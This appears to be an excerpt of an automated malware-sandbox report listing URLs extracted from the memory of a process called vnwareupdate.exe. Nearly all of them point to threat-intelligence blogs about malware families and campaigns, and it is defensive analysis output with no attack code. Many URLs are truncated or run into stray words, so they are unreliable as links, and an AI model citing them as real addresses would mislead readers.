Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://benkowlab.blogspot.com/2017/08/a-third-look-in-jsdropperursnif.html?m=1acA
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://benkowlab.blogspot.com/2017/08/a-third-look-in-jsdropperursnif.html?m=1tesDemocracy
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/1BFEujv
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://blacksecurity.org
Source: vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0day.jp/2015/06/linuxmayhem.html
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0day.jp/2015/06/linuxmayhem.htmlBlue
Source: vnwareupdate.exe, 00000003.00000003.241963093.0000000005611000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0day.jp/p/english-report-of-fhappi-freehosting.html?m=1
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploi
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploiFiesta
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploiTeaching
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0x3a.com/post/120423677154/unusual-njrat-campaign-originating-from-s
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0x3a.com/post/120423677154/unusual-njrat-campaign-originating-from-sDiscovering
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0x3a.com/post/120423677154/unusual-njrat-campaign-originating-from-sUnusual
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0x3a.com/post/127019416444/development-of-the-cryptoapp-ransomware
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0x3a.com/post/134260124544/inside-braviaxfakerean-an-analysis-and-hi
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0x3a.com/post/64094318510/analysis-of-the-internet-security-fake-ant
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.0x3a.com/post/64094318510/analysis-of-the-internet-security-fake-antAnalysis
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://blog.alyac.co.kr/1448
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.alyac.co.kr/1448CRCoinManager
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.alyac.co.kr/1448f
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: http://blog.alyac.co.kr/1519
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.alyac.co.kr/1519GlobeImposter
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://blog.alyac.co.kr/1519New
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://blog.alyac.co.kr/1519Operation
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: http://blog.alyac.co.kr/1521
Source: vnwareupdate.exe, 00000003.00000003.237611046.00000000038E7000.00000004.00000001.sdmp	String found in binary or memory: http://blog.alyac.co.kr/1527
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://blog.alyac.co.kr/1527Continued
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://blog.alyac.co.kr/1527Group5:
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.cari.net/carisirt-defaulting-on-passwords-part-1-r0_bot/Defaulting
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.cari.net/carisirt-defaulting-on-passwords-part-1-r0_bot/Hancitor
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkp
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/2017/01/23/hummingbad-returns/
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/2017/01/23/hummingbad-returns/.
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/2017/01/23/hummingbad-returns/A
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/2017/01/23/hummingbad-returns/Futurax
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/2017/03/21/swearing-trojan-continues-rage-even-author
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/2017/04/27/osx-malware-catching-waYi
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traf
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-trafOSX/Dok
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-trafShortJSRat
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/Spear
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intellige
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intellige8
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligeDigging
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf/Rocket
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdfARocket
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdfAttacks
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdfEvasive
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdfRocket
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdfnRocket
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdftRocket
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: http://blog.crowdstrike.com/ironman-deep-panda-uses-sakula-malware-target-organi
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: http://blog.crowdstrike.com/sakula-reloaded/
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: http://blog.crowdstrike.com/sakula-reloaded/Sakula
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://blog.crowdstrike.com/sakula-reloaded/Scanbox
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: http://blog.crowdstrike.com/sakula-reloaded/Tofsee
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: http://blog.cylance.com/puttering-into-the-future
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.cylance.com/spear-a-threat-actor-resurfaces
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.cylance.com/spear-a-threat-actor-resurfacesSPEAR:
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.cylance.com/spear-a-threat-actor-resurfacesThe
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.ht
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.htHong
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.htXSLCmd
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: http://blog.dragonthreatlabs.com/2015/07/dtl-06282015-01-apt-on-taiwan-insight.h
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.dragonthreatlabs.com/2015/07/dtl-06282015-01-apt-on-taiwan-insight.hAPT
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.dragonthreatlabs.com/2015/07/dtl-06282015-01-apt-on-taiwan-insight.hSpearphising
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.dynamoo.com/2015/05/malware-spam-attn-outstanding-invoices.html
Source: vnwareupdate.exe, 00000003.00000003.244930410.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.dynamoo.com/2015/07/malware-spam-hmrc-taxes-application.html
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.dynamoo.com/2015/07/malware-spam-hmrc-taxes-application.htmlGamarue
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companie
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companieBackdoor
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: http://blog.foregenix.com/malware-alert-new-pos-malware-tinypos
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: http://blog.fortinet.com/post/badmirror-new-android-malware-family-spotted-by-sh
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.fortinet.com/post/badmirror-new-android-malware-family-spotted-by-shAttacks
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.fortinet.com/post/locker-an-android-ransomware-full-of-surprises
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unk
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unkRATs
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unkSpam
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://blog.fortinet.com/post/what-s-cooking-dridex-s-new-and-undiscovered-recip
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.fortinet.com/post/what-s-cooking-dridex-s-new-and-undiscovered-recipDridex
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.fortinet.com/post/what-s-cooking-dridex-s-new-and-undiscovered-recipNew
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://blog.gentilkiwi.com/mimikatz
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.jpcert.or.jp/.s/2015/05/a-new-uac-bypass-method-that-dridex-uses.htm
Source: vnwareupdate.exe, 00000003.00000003.234268201.0000000006033000.00000004.00000001.sdmp	String found in binary or memory: http://blog.jpcert.or.jp/2015/07/poisonivy-adapts-to-communicate-through-authent
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-filesAsruex:
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-filesDiamondFox
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-filesEmissary
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.htmlDetecting
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.htmlDown
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: http://blog.knownsec.com/wp-content/uploads/2016/01/Malicious-Code-Analysis-on-U
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://blog.macnica.net/blog/2017/08/post-fb81.html
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.malwarebytes.org/exploits-2/2015/03/jamieoliver-com-still-compromise
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.malwarebytes.org/exploits-2/2015/03/jamieoliver-com-still-compromiseNew
Source: vnwareupdate.exe, 00000003.00000003.244930410.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: http://blog.malwarebytes.org/fraud-scam/2015/03/new-facebook-worm-variant-levera
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: http://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerabil
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/a-new-threat-an-iot-botnet-scanning-internet-on-port-
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/4DDG:
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/9DDG:
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/DDG:
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/ECHTHONIC
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/HARE_DENY_WRITEt
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/IDDG:
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/dDDG:
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/fDDG:
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/lDDG:
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/ource:
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/tDDG:
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickl
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickl0A
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickl1A
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickl2A
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickl4A
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickl7A
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickl8
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickl8A
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickl9A
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quicklA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quicklIA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quicklUA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quicklaA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quicklcA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickldA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickldiA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickleA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quicklfA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickliA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickliCompromised
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-b
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-bThe
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.nsfocus.net/blackmoon-bank-trojan-sample-technical-analysis-report/
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://blog.ropchain.com/2015/08/16/analysis-of-exploit-targeting-office-2007-20
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.ropchain.com/2015/08/16/analysis-of-exploit-targeting-office-2007-20Dyreza
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://blog.rvrsh3ll.net
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.shadowserver.org/2015/08/10/the-italian-connection-an-analysis-of-exYiSpecter:
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.233075798.00000000060F3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://blog.sucuri.net/2015/04/website-malware-the-swf-iframe-injector-evolves.h
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://blog.sucuri.net/2015/04/website-malware-the-swf-iframe-injector-evolves.hFrom
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://blog.sucuri.net/2015/04/website-malware-the-swf-iframe-injector-evolves.hSWF
